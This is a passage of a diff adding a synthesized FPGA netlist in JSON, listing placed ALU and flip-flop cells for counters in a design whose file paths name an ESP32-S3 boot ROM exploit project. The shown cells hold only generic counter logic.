+ "CE": [ 7687 ] + } + }, + "ledCounter_DFFRE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:53.26-53.40|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7692 ], + "I3": [ 8056 ], + "I1": [ 7693 ], + "I0": [ 8057 ], + "COUT": [ 7696 ], + "CIN": [ 7695 ] + } + }, + "ledCounter_DFFRE_Q_1": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y14/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7693 ], + "D": [ 7692 ], + "CLK": [ 7419 ], + "CE": [ 7687 ] + } + }, + "ledCounter_DFFRE_Q": { + "hide_name": 0, + "type": "DFFRE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y14/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:43.8-43.68", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "RESET": "input", + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "RESET": [ 7690 ], + "Q": [ 7689 ], + "D": [ 7688 ], + "CLK": [ 7419 ], + "CE": [ 7687 ] + } + }, + "instruction_counter_DFFE_Q_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X5Y10/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7557 ], + "I3": [ 8056 ], + "I1": [ 7558 ], + "I0": [ 8057 ], + "COUT": [ 7685 ], + "CIN": [ 7615 ] + } + }, + "instruction_counter_DFFE_Q_9_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7679 ], + "I3": [ 8056 ], + "I1": [ 7681 ], + "I0": [ 8057 ], + "COUT": [ 7677 ], + "CIN": [ 7567 ] + } + }, + "instruction_counter_DFFE_Q_9": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7681 ], + "D": [ 7679 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_8_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7672 ], + "I3": [ 8056 ], + "I1": [ 7674 ], + "I0": [ 8057 ], + "COUT": [ 7670 ], + "CIN": [ 7677 ] + } + }, + "instruction_counter_DFFE_Q_8": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7674 ], + "D": [ 7672 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_7_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7667 ], + "I3": [ 8056 ], + "I1": [ 7668 ], + "I0": [ 8057 ], + "COUT": [ 7665 ], + "CIN": [ 7670 ] + } + }, + "instruction_counter_DFFE_Q_7": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X3Y10/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7668 ], + "D": [ 7667 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_6_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7661 ], + "I3": [ 8056 ], + "I1": [ 7663 ], + "I0": [ 8057 ], + "COUT": [ 7659 ], + "CIN": [ 7665 ] + } + }, + "instruction_counter_DFFE_Q_6": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7663 ], + "D": [ 7661 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_5_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7655 ], + "I3": [ 8056 ], + "I1": [ 7657 ], + "I0": [ 8057 ], + "COUT": [ 7653 ], + "CIN": [ 7659 ] + } + }, + "instruction_counter_DFFE_Q_5": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7657 ], + "D": [ 7655 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_4_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7649 ], + "I3": [ 8056 ], + "I1": [ 7651 ], + "I0": [ 8057 ], + "COUT": [ 7647 ], + "CIN": [ 7653 ] + } + }, + "instruction_counter_DFFE_Q_4": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7651 ], + "D": [ 7649 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_3_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7643 ], + "I3": [ 8056 ], + "I1": [ 7645 ], + "I0": [ 8057 ], + "COUT": [ 7641 ], + "CIN": [ 7647 ] + } + }, + "instruction_counter_DFFE_Q_3": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7645 ], + "D": [ 7643 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_2_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7617 ], + "I3": [ 8056 ], + "I1": [ 7618 ], + "I0": [ 8057 ], + "COUT": [ 7614 ], + "CIN": [ 7641 ] + } + }, + "instruction_counter_DFFE_Q_23_D_LUT1_F": { + "hide_name": 0, + "type": "LUT1", + "parameters": { + "INIT": "01" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y8/LUT2", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:135.23-136.15", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I0": "input", + "F": "output" + }, + "connections": { + "I0": [ 7635 ], + "F": [ 7638 ] + } + }, + "instruction_counter_DFFE_Q_23": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y8/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7635 ], + "D": [ 7638 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM_CIN_ALU_COUT": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU1", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7636 ], + "I3": [ 8056 ], + "I1": [ 7635 ], + "I0": [ 8056 ], + "COUT": [ 7633 ], + "CIN": [ 8067 ] + } + }, + "instruction_counter_DFFE_Q_22_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7630 ], + "I3": [ 8056 ], + "I1": [ 7631 ], + "I0": [ 8057 ], + "COUT": [ 7628 ], + "CIN": [ 7633 ] + } + }, + "instruction_counter_DFFE_Q_22": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/DFF2", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7631 ], + "D": [ 7630 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_21_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7625 ], + "I3": [ 8056 ], + "I1": [ 7626 ], + "I0": [ 8057 ], + "COUT": [ 7623 ], + "CIN": [ 7628 ] + } + }, + "instruction_counter_DFFE_Q_21": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/DFF3", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7626 ], + "D": [ 7625 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_20_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7620 ], + "I3": [ 8056 ], + "I1": [ 7621 ], + "I0": [ 8057 ], + "COUT": [ 7612 ], + "CIN": [ 7623 ] + } + }, + "instruction_counter_DFFE_Q_20": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y11/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7621 ], + "D": [ 7620 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_2": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/DFF4", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7618 ], + "D": [ 7617 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_1_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X4Y10/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7560 ], + "I3": [ 8056 ], + "I1": [ 7561 ], + "I0": [ 8057 ], + "COUT": [ 7615 ], + "CIN": [ 7614 ] + } + }, + "instruction_counter_DFFE_Q_19_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/ALU5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7609 ], + "I3": [ 8056 ], + "I1": [ 7610 ], + "I0": [ 8057 ], + "COUT": [ 7607 ], + "CIN": [ 7612 ] + } + }, + "instruction_counter_DFFE_Q_19": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X1Y10/DFF5", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7610 ], + "D": [ 7609 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_18_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/ALU0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:65.32-65.55|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/arith_map.v:57.7-63.5", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "I2": "input", + "SUM": "output", + "I3": "input", + "I1": "input", + "I0": "input", + "COUT": "output", + "CIN": "input" + }, + "connections": { + "I2": [ 8056 ], + "SUM": [ 7604 ], + "I3": [ 8056 ], + "I1": [ 7605 ], + "I0": [ 8057 ], + "COUT": [ 7602 ], + "CIN": [ 7607 ] + } + }, + "instruction_counter_DFFE_Q_18": { + "hide_name": 0, + "type": "DFFE", + "parameters": { + }, + "attributes": { + "BEL_STRENGTH": "00000000000000000000000000000001", + "NEXTPNR_BEL": "X2Y10/DFF0", + "src": "c:\\Users\\human\\OneDrive\\Documents\\Git\\esp-bootrom-exploit\\ESP32-S3_Exploit\\ESP32-S3_Exploit_BitBang\\ES32-S3_Exploit_BitBang.v:31.1-67.4|c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_map.v:19.7-19.56", + "module_not_derived": "00000000000000000000000000000001" + }, + "port_directions": { + "Q": "output", + "D": "input", + "CLK": "input", + "CE": "input" + }, + "connections": { + "Q": [ 7605 ], + "D": [ 7604 ], + "CLK": [ 7419 ], + "CE": [ 7556 ] + } + }, + "instruction_counter_DFFE_Q_17_D_ALU_SUM": { + "hide_name": 0, + "type": "ALU", + "parameters": { + "ALU_MODE": "00000000000000000000000000000010" + }, + "attributes": { + "BEL_STRENGTH": 